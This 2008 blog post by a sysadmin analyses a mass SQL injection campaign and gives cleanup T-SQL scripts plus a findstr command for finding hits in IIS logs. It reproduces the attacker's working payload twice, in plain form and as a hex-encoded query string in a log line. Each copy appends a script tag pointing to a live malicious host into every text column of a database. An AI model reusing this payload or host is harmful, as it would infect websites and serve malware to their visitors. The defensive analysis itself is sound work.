Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then installs a cookie - its also injecting into whatever database is there, I have not gone through all the code but it has already changed since this morning.  It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental cllicking)***

Here is the code for the new injection:

BEGIN exec(’update ['+@T+'] set ['+@C+']=['+@C+']+””></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–”’)

Notice the beginning of the insert. Its not your traditional <script= its “></title><script src=

Bastards did it to move around the reverse script cleaning method. Here is a modified script taking into account the new “”></title><script src=” code. Oh also notice the closed html comment. This was to fight off the previous </script> for the WHERE clause on the cleaning script.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%<eltit/><”%”, reverse(convert(varchar (max),['+@C+']))) + 9))) where ['+@C+'] like ”%”></title>%<!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below for looking at my references above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%tpircs<%”, reverse(convert(varchar (max),['+@C+']))) + 6))) where ['+@C+'] like ”%<script%</script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

To find out which web pages are being hit go to the root of your web logs..

In iis there should be a site identifier that will help you to locate which site it is.

From the root of the web logs issue this command:
(this will search todays logs.. its its yesterday search then)

findstr /s /i /n /c:”declare” ex080807.log &gt;&gt; sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because its not important.. EXCEPT for the http return code

200 is ofcourse OK which means the webserver processes the request.

So a query string in index.asp located in the following website: W3SVC12345678.

You can find out which site that is by going into inetmgr and looking in the site identifier field.

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Comments/Questions etc.  Thanks.

Tags: hack, injection, sql, web
Posted in news, webdesign |

This entry was posted on Wednesday, August 6th, 2008 at 12:48 pm and is filed under news, webdesign. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.